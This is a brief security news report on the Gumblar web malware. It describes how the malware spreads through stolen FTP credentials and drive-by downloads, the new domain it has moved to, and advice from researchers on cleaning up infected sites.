14 DAY TRIAL // Security researchers warn that the currently most widespread web threat, technically known as JSRedir-R, but generally called Gumblar, has morphed in order to resist take-down attempts. The new iteration of this exploit features a new domain name and more complex obfuscation.
Gumblar is a complex web exploit. Reportedly, it compromises websites through FTP credentials stolen from infected machines used to administer them. Once in, it appends obfuscated code to many types of files, HTML, JavaScript, PHP and even images. It also installs backdoors, for example in .htaccess, making cleaning more difficult.
The obfuscated code proceeds to infecting visitors through a method called drive-by download. More specifically, it attempts to exploit known vulnerabilities in Adobe Reader or Flash Player through malicious files served from a domain called gumblar.cn, hence its name. Recently, Sophos has reported that JSRedir-R amounts to over 40% of the infections detected on the web.
Security researchers from ScanSafe warn that a new version of this exploit has been seen in the wild. "The Gumblar attacks have morphed again, this time pulling the malcode from martuz.cn. In addition, the reference URI remains slightly obfuscated – perhaps an attempt to thwart rudimentary blacklists. For example, the URI resulting from the injected script might appear as mar"+"tuz.cn instead of just martuz.cn," they explain.
Symantec analysts confirm the new attacks and add that, "The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains." There is yet no indication that the new version will spread as fast as the previous one, but, regardless of that, the researchers "expect the domains and malicious JavaScript appearing on the websites to continually change as one mole is whacked, and another pops up."
Webmasters can use the free online Unmask Parasites Beta scanner, which checks web pages for hidden illicit content inserted by hackers. Websites compromised with Gumblar will only show up as "suspicious" after the scan, but that should be enough to serve as starting point for further investigation.
ScanSafe's Mary Landesman cautions that, "The attackers are gaining initial access via FTP credentials that were stolen as a result of that infection. So don't just clean up your website; you'll want to cleanup any of the computers used to manage that website as well."